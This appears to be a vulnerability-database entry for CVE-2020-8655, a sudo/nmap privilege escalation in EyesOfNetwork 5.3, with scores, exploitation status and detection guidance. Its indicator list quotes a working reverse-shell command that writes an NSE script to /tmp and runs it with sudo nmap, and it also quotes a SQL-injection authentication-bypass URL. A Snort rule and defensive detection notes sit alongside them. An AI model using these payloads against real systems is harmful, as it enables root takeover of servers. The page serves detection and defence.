cbcvebase.
CVE-2020-8655
published 2020-02-07

CVE-2020-8655: An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run…

PriorityP183high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
58.08%
99.0th percentile
An issue was discovered in EyesOfNetwork 5.3. The sudoers configuration is prone to a privilege escalation vulnerability, allowing the apache user to run arbitrary commands as root via a crafted NSE script for nmap 7.

Affected

1 ranges
VendorProductVersion rangeFixed in
eyesofnetworkeyesofnetwork

Detection & IOCsextracted from sources · hover to see the quote

path/lilac/autodiscovery.php
path/eonapi/getApiKey
path/tmp/h4k
path/usr/bin/nmap
url/eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
command;echo "local os = require \"os\" hostrule=function(host) os.execute(\"/bin/sh -i >& /dev/tcp/192.168.30.112/8081 0>&1\") end action=function() end" > /tmp/h4k;sudo /usr/bin/nmap localhost -p 1337 -script /tmp/h4k #
path/eonapi/createEonUser
path/login.php
port443
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT EyesOfNetwork Autodiscover Command Injection (CVE-2020-8654)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/lilac/autodiscovery.php"; endswith; fast_pattern; http.request_body; content:"request=autodiscover"; nocase; content:"job_name="; nocase; content:"nmap_binary"; nocase; content:"target[]"; nocase; content:"os.execute("; nocase; reference:url,www.exploit-db.com/exploits/48169; reference:cve,2020-8654; reference:cve,2020-8655; classtype:attempted-admin; sid:2034311; rev:1; metadata:attack_target Server, created_at 2021_11_01, cve CVE_2020_8654, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2021_11_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Detect POST requests to /lilac/autodiscovery.php containing 'request=autodiscover', 'nmap_binary', 'target[]', and 'os.execute(' in the body — the combination indicates NSE payload injection for CVE-2020-8655 privilege escalation via nmap.
  • Monitor for creation of NSE script files in /tmp (e.g. /tmp/h4k) followed by execution of 'sudo /usr/bin/nmap' with a --script flag pointing to /tmp — this is the privilege escalation execution chain for CVE-2020-8655.
  • Flag the exploit-specific user-agent string 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37' in HTTP logs as it is hardcoded in the public PoC exploit script.
  • Detect the command injection pattern ';id #' or similar semicolon-prefixed commands with a trailing '#' comment in the target[] POST parameter of autodiscovery.php.
  • ·The Metasploit module requires HTTPS (SSL=true) and will not function over plain HTTP; RPORT defaults to 443.
  • ·The nmap privesc (CVE-2020-8655) depends on nmap version 6.40 being present, which lacks the -c and -e options, making NSE script execution the only viable escalation path.
  • ·Authentication bypass via hardcoded API key applies only to EON 5.3; EON 5.1 and 5.2 can only be exploited via SQL injection.

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.